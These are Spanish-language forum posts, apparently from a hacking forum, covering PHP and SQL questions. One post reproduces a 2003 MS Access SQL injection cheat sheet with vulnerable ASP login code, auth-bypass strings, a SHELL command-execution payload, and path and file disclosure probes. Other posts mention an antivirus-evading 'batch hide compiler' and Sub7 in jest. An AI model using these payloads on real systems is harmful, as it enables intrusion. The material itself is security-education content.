Mensajes

aaah es access, porque no usas mssql o sqlite?

talves este documento te pueda ayudar:
http://seclists.org/pen-test/2003/May/74

Access SQL Injection From: "Brett Moore" <brett.moore () security-assessment com>
Date: Mon, 19 May 2003 16:25:24 +1200

============================================================================
% Access SQL Injection
% brett.moore () security-assessment com
============================================================================

Nothing new here, move along..

****************************************************************************
% MS Access system tables
****************************************************************************
        MSysACEs
        MSysObjects
        MSysQueries
        MSysRelationships

****************************************************************************
% MS Access command execution, (older versions only)
****************************************************************************
[Auth Page Script]

        user = request("user")
        pass = request("pass")
        Set Conn = Server.CreateObject("ADODB.Connection")
        Set Rs = Server.CreateObject("ADODB.Recordset")
        Conn.Open dsn
        SQL = "SELECT * FROM users where pass='"& pass &"' and user='"& user & "'"
        rs.open sql,conn
        if rs.eof and rs.bof then
                ' Access Denied
        else
                ' Access Allowed
        end if

[Auth Page Bypass]

        user = |SHELL("cmd.exe /c dir > c:\test.txt")|
        pass = test

****************************************************************************
% Auth Bypass, Basic
****************************************************************************
[Auth Page Script]

        user = request("user")
        pass = request("pass")
        Set Conn = Server.CreateObject("ADODB.Connection")
        Set Rs = Server.CreateObject("ADODB.Recordset")
        Conn.Open dsn
        SQL = "SELECT * FROM users where pass='"& pass &"' and user='"& user & "'"
        rs.open sql,conn
        if rs.eof and rs.bof then
                ' Access Denied
        else
                ' Access Allowed
        end if

[Auth Page Bypass]

        user = ' or '1'='1
        pass = test

****************************************************************************
% Auth Bypass, Simple
****************************************************************************
[Auth Page Script]

        user = request("user")
        pass = request("pass")
        Set Conn = Server.CreateObject("ADODB.Connection")
        Set Rs = Server.CreateObject("ADODB.Recordset")
        Conn.Open dsn
        SQL = "SELECT user,pass FROM users where user='"& user & "'"
        rs.open sql,conn
        if rs.eof and rs.bof then
                ' Access Denied
        else
                if (rs("pass") = pass) then
                        ' Access Allowed
                else
                        ' Access Denied
                end if
        end if

[Auth Page Bypass Using Shares]

        user = ' union select name,password  from table1 in '\\share\test\test.mdb
        pass = password that is set in \\share\test\test.mdb

[Auth Page Bypass Local mdbs]

        user = ' union select '0test','0test' from customers in
'C:\winnt\Help\iisHelp\iis\htm\tutorial\eecustmr.mdb'
        pass = 0test

[Union Notes]

        Remeber when using unions the sort order can affect the first record
returned.

****************************************************************************
% System Path Disclosure
****************************************************************************
[Sql String]
        user = test' union select names from msysobjects in '.

[ODBC Response]

        Microsoft OLE DB Provider for ODBC Drivers (0x80004005)
        [Microsoft][ODBC Microsoft Access Driver] The Microsoft Jet database engine
cannot
        open the file 'C:\WINNT\system32'. It is already opened exclusively by
another user,
        or you need permission to view its data.

****************************************************************************
% Verify File Exists
****************************************************************************
[Sql String - non-existant file]
        user = test' union select name from msysobjects in '\proof

[ODBC Response]
        Microsoft OLE DB Provider for ODBC Drivers (0x80004005)
        [Microsoft][ODBC Microsoft Access Driver] Could not find file 'C:\proof'.

[Sql String - existant]
        user = test' union select name from msysobjects in '\proof.txt

[ODBC Response]
        Microsoft OLE DB Provider for ODBC Drivers (0x80004005)
        [Microsoft][ODBC Microsoft Access Driver] Unrecognized database format
'C:\proof.txt'.

****************************************************************************
% Verify Path Exists
****************************************************************************
[Sql String - non-existant path]
        test' union select name from msysobjects in '\nopath\sqlerr

[ODBC Response]
        Microsoft OLE DB Provider for ODBC Drivers (0x80004005)
        [Microsoft][ODBC Microsoft Access Driver] 'C:\nopath\sqlerr' is not a valid
path.
        Make sure that the path name is spelled correctly and that you are
connected to the
        server on which the file resides.

[Sql String - existant path]
        user = test' union select name from msysobjects in '\inetpub\sqlerr

[ODBC Response]
        Microsoft OLE DB Provider for ODBC Drivers (0x80004005)
        [Microsoft][ODBC Microsoft Access Driver] Could not find file
'C:\inetpub\sqlerr'.



---------------------------------------------------------------------------
*** Wireless LAN Policies for Security & Management - NEW White Paper ***
Just like wired networks, wireless LANs require network security policies
that are enforced to protect WLANs from known vulnerabilities and threats.
Learn to design, implement and enforce WLAN security policies to lockdown enterprise WLANs.

To get your FREE white paper visit us at:   
http://www.securityfocus.com/AirDefense-pen-test
----------------------------------------------------------------------------

y que tal si necesitas ingresar en la base de datos un texto que contenga comillas? se omitirán?
usa backslashses y encierra los strings en comillas dobles.

en mssql no se como funcionan los carácteres de escape a diferencia de mysql pero puedes filtrar % \x00 ' "
en php el filtro musql_real_escape_string() se comporta masomenos así:

mysql_real_escape_string() calls MySQL's library function mysql_real_escape_string, which prepends backslashes to the following characters: \x00, \n, \r, \, ', " and \x1a.

Te recomiendo siempre optar no por la eliminación de carácteres sino por el buén funcionamiento adecuado, o sea, si yo quiero escribir <%hola's%> en la base de datos debo poder hacerlo.

los valores hexa en mssql son atraves de la funcion convert()
Convert(int, 0x0102030405a1a2a3a4a5)

no necesitas el mysql_num_rows() pero bueno, ahi ves.

veré si puedo ingresar al concurso, traeré a recuerdo el mismo programa que he llevado en casi todos los abril negros en que he concursado solo que cada ves son versiones mas nuevas y útiles.

veré si puedo retomar el batch hide compiler pero en version online con su generador de stub online y todo lo demás, hecho integramente en php.

si alguien tiene un host que me quiera hospedar pues seria genial porque los antivirus de seguro que van a blokear dicha pagina xDDD, o mejor me lo haré en un hosting gratuito por ahi no se.

jajaja que chafa el filtro

no se puede porque obtener ese tipo de datos es atentar contra la privacidad del usuario, lo unico que puedes hacer como te dicen mas arriba es utilizar un activex, un programa que se ejecuta al lado del explorador y que manda los datos, pero en ese caso sería como instalarle un troyano xD el sub7 funcionaría mejor.

los únicos datos del visitante que puedes obtener por parte de php son estos:

Código (php) [Seleccionar] Expandir

<?php echo nl2br(htmlspecialchars(print_r($_SERVER, true), ENT_QUOTES)); ?>

Por parte de javascript podrás tomar mas datos como el horario local y esas cosas pero nada relacionado con datos personales ni de la pc ni nada de esas cosas.

no me gusta dreamweaver, prefiero usar gedit mas kompozer y firebug

asi?

Código (php) [Seleccionar] Expandir

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<body>
 <style type="text/css">
  <!--
  body {
   background-color: #0066FF;
  }
  .Estilo1 {font-size: 24px}
  -->
 </style>
</head>
<body>
<?php
include("Connections/ip.php");
if(mysql_query("
 select ip from maquina
 where ip='".mysql_real_escape_string($_SERVER['REMOTE_ADDR'])."'
 limit 1
", $ip)){
?>

<form action="validar_usuario.php" method="post">
 <div align="center">
   <p>&nbsp;</p>
   <p class="Estilo1"></p>
   <p>&nbsp;</p>
   <table width="200" border="2">
     <tr>
       <th scope="row">Contrase&ntilde;a</th>
       <td><input name="password" type="password" id="password" size="10" maxlength="10" /></td>
     </tr>
   </table>
   <p>
     <input type="submit" value="Aceptar" />
   </p>
   <br />
 </div>
</form>

<?php }else{ ?>
acceso denegado
<?php } ?>

</body>
</html>



todavía nadie??

Hola, acá se explica todo lo que necesitas:

http://foro.elhacker.net/nivel_web/iquestcomo_iniciarse_en_la_seguridad_web-t279791.0.html